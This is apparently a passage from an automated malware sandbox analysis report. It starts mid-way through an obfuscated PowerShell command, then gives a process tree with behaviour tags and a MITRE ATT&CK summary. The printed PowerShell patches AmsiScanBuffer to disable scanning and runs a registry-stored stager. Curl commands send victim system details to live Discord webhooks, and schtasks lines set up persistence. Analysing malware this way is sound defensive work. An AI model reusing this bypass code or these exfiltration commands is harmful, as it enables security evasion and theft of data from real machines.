'+'n'+''+[Char](118)+''+'o'+''+'k'+'e','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+','+'N'+[Char](101)+'wS'+'l'+'o'+'t'+''+[Char](
44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$FfDLwCFLwj,$wQHPWKZNqUmUHS).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');Write-Output $CNoGlYvJxaa.CreateType();}$zlSZHQSZDdIbd=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+'of'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+'2'+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+'t'+'i'+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$LPNWelmbpYSLwo=$zlSZHQSZDdIbd.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+'o'+'c'+''+[Char](65)+'d'+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ccnNdwrbLmwftmoBeKi=KheAFTgcWVjf @([String])([IntPtr]);$bVQwzdyqubsKquGnQrBRlb=KheAFTgcWVjf 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cyjiJAhoJrQ=$zlSZHQSZDdIbd.GetMethod('G'+[Char](101)+''+'t'+''+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+[Char](101)+''+'H'+''+'a'+''+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'32'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')));$eepqzGCebUEmqC=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+'A'+'')));$dFswwMZgFBecwnDhF=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$cyjiJAhoJrQ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+'r'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$JDKnOsM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($eepqzGCebUEmqC,$ccnNdwrbLmwftmoBeKi).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$YlYSDLczSfqNbAFze=$LPNWelmbpYSLwo.Invoke($Null,@([Object]$JDKnOsM,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$UISooMkNsu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqubsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,4,[ref]$UISooMkNsu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YlYSDLczSfqNbAFze,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dFswwMZgFBecwnDhF,$bVQwzdyqubsKquGnQrBRlb).Invoke($YlYSDLczSfqNbAFze,[uint32]8,0x20,[ref]$UISooMkNsu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'F'+[Char](84)+'W'+'A'+''+[Char](82)+'E').GetValue('$'+'7'+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+''+'g'+'e'+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\Conhost.exe  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - [2] C:\Users\Admin\AppData\Roaming\$77-scchost.exe  cmd: C:\Users\Admin\AppData\Roaming\$77-scchost.exe
    - Executes dropped EXE
  - [2] C:\Users\Admin\AppData\Roaming\$77-scchost.exe  cmd: C:\Users\Admin\AppData\Roaming\$77-scchost.exe
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - [2] C:\Windows\system32\sihost.exe  cmd: sihost.exe
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- [1] C:\Windows\System32\spoolsv.exe  cmd: C:\Windows\System32\spoolsv.exe
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
  - Drops file in System32 directory
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\sysmon.exe  cmd: C:\Windows\sysmon.exe
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  - Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- [1] C:\Windows\system32\wbem\unsecapp.exe  cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- [1] C:\Windows\Explorer.EXE  cmd: C:\Windows\Explorer.EXE
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of UnmapMainImage
  - [2] C:\Users\Admin\AppData\Local\Temp\Dropper.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
    - Checks computer location settings
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\Conhost.exe  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - [3] C:\Windows\SysWOW64\cmd.exe  cmd: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\curl.exe  cmd: curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\schtasks.exe  cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
        - Scheduled Task/Job: Scheduled Task
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\cmd.exe  cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\schtasks.exe  cmd: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
          - Scheduled Task/Job: Scheduled Task
      - [4] C:\Windows\system32\cmd.exe  cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp52ED.tmp.bat""
        - Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\timeout.exe  cmd: timeout 3
          - Delays execution with timeout.exe
        - [5] C:\Users\Admin\AppData\Roaming\$77-aachost.exe  cmd: "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - [6] C:\Windows\System32\cmd.exe  cmd: "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
            - Suspicious use of WriteProcessMemory
            - [7] C:\Windows\system32\curl.exe  cmd: curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: OAILVCNY\nSystem Architecture: 64-bit\nHWID: 7580D06170B47B6124F3\nUser HWID: S-1-5-21-3808065738-1666277613-1125846146-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-install.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
      - Executes dropped EXE
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- [1] C:\Windows\system32\DllHost.exe  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- [1] C:\Windows\System32\RuntimeBroker.exe  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\System32\RuntimeBroker.exe  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\System32\RuntimeBroker.exe  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  - Modifies data under HKEY_USERS
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS
- [1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe  cmd: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [1] C:\Windows\system32\SppExtComObj.exe  cmd: C:\Windows\system32\SppExtComObj.exe -Embedding
- [1] C:\Windows\system32\DllHost.exe  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
- [1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  - [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=122.0.6261.70 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=122.0.2365.52 --initial-client-data=0x238,0x23c,0x240,0x234,0x2ac,0x7ffadb592e98,0x7ffadb592ea4,0x7ffadb592eb0
  - [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2376 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:3
  - [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  cmd: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=2180,i,12780723798465539942,12010519452607841069,262144 --variations-seed-version /prefetch:8
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 0f4179844b985fb0da3eec13dbbf6599 3/8dJH+muUyT9r7paoNZ2Q.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads